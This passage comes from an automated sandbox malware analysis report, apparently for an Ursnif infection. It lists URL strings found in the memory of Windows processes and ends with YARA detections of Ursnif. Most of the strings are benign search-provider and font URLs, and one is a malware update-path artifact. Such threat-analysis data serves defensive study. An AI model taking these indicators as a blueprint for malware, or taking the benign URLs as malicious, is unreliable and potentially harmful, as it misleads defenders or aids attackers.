Source: explorer.exe, 0000001D.00000000.390940083.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://fontfabrik.com
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://fr.search.yahoo.com/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://google.pchome.com.tw/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://home.altervista.org/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://home.altervista.org/favicon.ico
Source: loaddll32.exe, 00000000.00000002.370796430.0000000002810000.00000040.00000001.sdmp, loaddll32.exe, 00000000.00000003.340776035.0000000002850000.00000004.00000001.sdmp, powershell.exe, 00000013.00000003.358522767.0000022F9D7D0000.00000004.00000001.sdmp, control.exe, 0000001A.00000003.354083922.0000020E4A350000.00000004.00000001.sdmp, explorer.exe, 0000001D.00000002.511989031.0000000003B8E000.00000004.00000001.sdmp, RuntimeBroker.exe, 0000001E.00000002.510030791.000002413CA4E000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000020.00000002.502898897.000001E7666AE000.00000004.00000001.sdmp String found in binary or memory: http://https://file://USER.ID%lu.exe/upd
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://ie.search.yahoo.com/os?command=
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://ie8.ebay.com/open-search/output-xml.php?q=
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://image.excite.co.jp/jp/favicon/lep.ico
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://images.joins.com/ui_c/fvc_joins.ico
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://images.monster.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://img.atlas.cz/favicon.ico
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://img.shopzilla.com/shopzilla/shopzilla.ico
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://in.search.yahoo.com/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://it.search.dada.net/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://it.search.dada.net/favicon.ico
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://it.search.yahoo.com/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://jobsearch.monster.com/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://kr.search.yahoo.com/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://list.taobao.com/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://list.taobao.com/browse/search_visual.htm?n=15&amp;q=
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://mail.live.com/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://mail.live.com/?rru=compose%3Fsubject%3D
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://msk.afisha.ru/
Source: powershell.exe, 00000013.00000003.316077388.0000022F8657E000.00000004.00000001.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://ocnsearch.goo.ne.jp/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://openimage.interpark.com/interpark.ico
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://p.zhongsou.com/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://p.zhongsou.com/favicon.ico
Source: powershell.exe, 00000013.00000003.315876431.0000022F863B7000.00000004.00000001.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://price.ru/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://price.ru/favicon.ico
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://recherche.linternaute.com/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://recherche.tf1.fr/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://recherche.tf1.fr/favicon.ico
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://rover.ebay.com
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://ru.search.yahoo.com
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://sads.myspace.com/
Source: powershell.exe, 00000013.00000002.373535807.0000022F84FD1000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://search-dyn.tiscali.it/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://search.about.com/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://search.alice.it/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://search.alice.it/favicon.ico
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://search.aol.co.uk/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://search.aol.com/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://search.aol.in/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://search.atlas.cz/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://search.auction.co.kr/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://search.auone.jp/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://search.books.com.tw/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://search.books.com.tw/favicon.ico
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://search.centrum.cz/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://search.centrum.cz/favicon.ico
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://search.chol.com/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://search.chol.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://search.cn.yahoo.com/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://search.daum.net/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://search.daum.net/favicon.ico
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://search.dreamwiz.com/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://search.dreamwiz.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://search.ebay.co.uk/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://search.ebay.com/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://search.ebay.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://search.ebay.de/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://search.ebay.es/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://search.ebay.fr/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://search.ebay.in/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://search.ebay.it/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://search.empas.com/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://search.empas.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://search.espn.go.com/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://search.gamer.com.tw/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://search.gamer.com.tw/favicon.ico
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://search.gismeteo.ru/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://search.goo.ne.jp/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://search.goo.ne.jp/favicon.ico
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://search.hanafos.com/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://search.hanafos.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://search.interpark.com/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://search.ipop.co.kr/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://search.ipop.co.kr/favicon.ico
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://search.live.com/results.aspx?FORM=IEFM1&amp;q=
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://search.live.com/results.aspx?FORM=SO2TDF&amp;q=
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://search.live.com/results.aspx?FORM=SOLTDF&amp;q=
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://search.live.com/results.aspx?q=
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://search.livedoor.com/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://search.livedoor.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://search.lycos.co.uk/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://search.lycos.com/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://search.lycos.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://search.msn.co.jp/results.aspx?q=
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://search.msn.co.uk/results.aspx?q=
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://search.msn.com.cn/results.aspx?q=
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://search.msn.com/results.aspx?q=
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://search.nate.com/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://search.naver.com/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://search.naver.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://search.nifty.com/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://search.orange.co.uk/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://search.orange.co.uk/favicon.ico
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://search.rediff.com/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://search.rediff.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://search.seznam.cz/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://search.seznam.cz/favicon.ico
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://search.sify.com/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://search.yahoo.co.jp
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://search.yahoo.co.jp/favicon.ico
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://search.yahoo.com/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://search.yahoo.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://search.yahooapis.jp/AssistSearchService/V2/webassistSearch?output=iejson&amp;p=
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://search.yam.com/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://search1.taobao.com/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://search2.estadao.com.br/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://searchresults.news.com.au/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://service2.bfast.com/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://sitesearch.timesonline.co.uk/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://so-net.search.goo.ne.jp/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://suche.aol.de/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://suche.freenet.de/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://suche.freenet.de/favicon.ico
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://suche.lycos.de/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://suche.t-online.de/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://suche.web.de/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://suche.web.de/favicon.ico
Source: explorer.exe, 0000001D.00000000.383246627.0000000006FE0000.00000002.00000001.sdmp String found in binary or memory: http://treyresearch.net
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://tw.search.yahoo.com/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://udn.com/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://udn.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://uk.ask.com/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://uk.ask.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://uk.search.yahoo.com/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://vachercher.lycos.fr/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://video.globo.com/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://video.globo.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://web.ask.com/
Source: explorer.exe, 0000001D.00000000.383246627.0000000006FE0000.00000002.00000001.sdmp String found in binary or memory: http://www.%s.com
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://www.abril.com.br/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://www.abril.com.br/favicon.ico
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://www.afisha.ru/App_Themes/Default/images/favicon.ico
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://www.alarabiya.net/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://www.alarabiya.net/favicon.ico
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://www.amazon.co.jp/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://www.amazon.co.uk/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://www.amazon.com/exec/obidos/external-search/104-2981279-3455918?index=blended&amp;keyword=
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://www.amazon.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://www.amazon.com/gp/search?ie=UTF8&amp;tag=ie8search-20&amp;index=blended&amp;linkCode=qs&amp;c
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://www.amazon.de/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://www.aol.com/favicon.ico
Source: powershell.exe, 00000013.00000003.315483895.0000022F86026000.00000004.00000001.sdmp, explorer.exe, 0000001D.00000000.390940083.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 00000013.00000003.315876431.0000022F863B7000.00000004.00000001.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://www.arrakis.com/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://www.arrakis.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://www.asharqalawsat.com/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://www.asharqalawsat.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://www.ask.com/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://www.auction.co.kr/auction.ico
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://www.baidu.com/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://www.baidu.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.390940083.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://www.cdiscount.com/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://www.cdiscount.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://www.ceneo.pl/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://www.ceneo.pl/favicon.ico
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://www.chennaionline.com/ncommon/images/collogo.ico
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://www.cjmall.com/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://www.cjmall.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://www.clarin.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://www.cnet.co.uk/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://www.cnet.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://www.dailymail.co.uk/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://www.dailymail.co.uk/favicon.ico
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://www.docUrl.com/bar.htm
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://www.etmall.com.tw/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://www.etmall.com.tw/favicon.ico
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://www.excite.co.jp/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://www.expedia.com/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://www.expedia.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.390940083.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 0000001D.00000000.390940083.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 0000001D.00000000.390940083.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 0000001D.00000000.390940083.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 0000001D.00000000.390940083.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: explorer.exe, 0000001D.00000000.390940083.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 0000001D.00000000.390940083.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 0000001D.00000000.390940083.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 0000001D.00000000.390940083.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 0000001D.00000000.390940083.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 0000001D.00000000.390940083.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 0000001D.00000000.390940083.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 0000001D.00000000.390940083.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 0000001D.00000000.390940083.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://www.gismeteo.ru/favicon.ico
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://www.gmarket.co.kr/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://www.gmarket.co.kr/favicon.ico
Source: explorer.exe, 0000001D.00000000.390940083.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://www.google.co.in/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://www.google.co.jp/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://www.google.co.uk/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://www.google.com.br/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://www.google.com.sa/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://www.google.com.tw/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://www.google.com/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://www.google.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://www.google.cz/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://www.google.de/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://www.google.es/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://www.google.fr/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://www.google.it/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://www.google.pl/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://www.google.ru/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://www.google.si/
Source: explorer.exe, 0000001D.00000000.383619707.00000000070D3000.00000002.00000001.sdmp String found in binary or memory: http://www.iask.com/

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected Ursnif
Source: Yara match File source: Process Memory Space: loaddll32.exe PID: 4396, type: MEMORY
Source: Yara match File source: Process Memory Space: control.exe PID: 6996, type: MEMORY
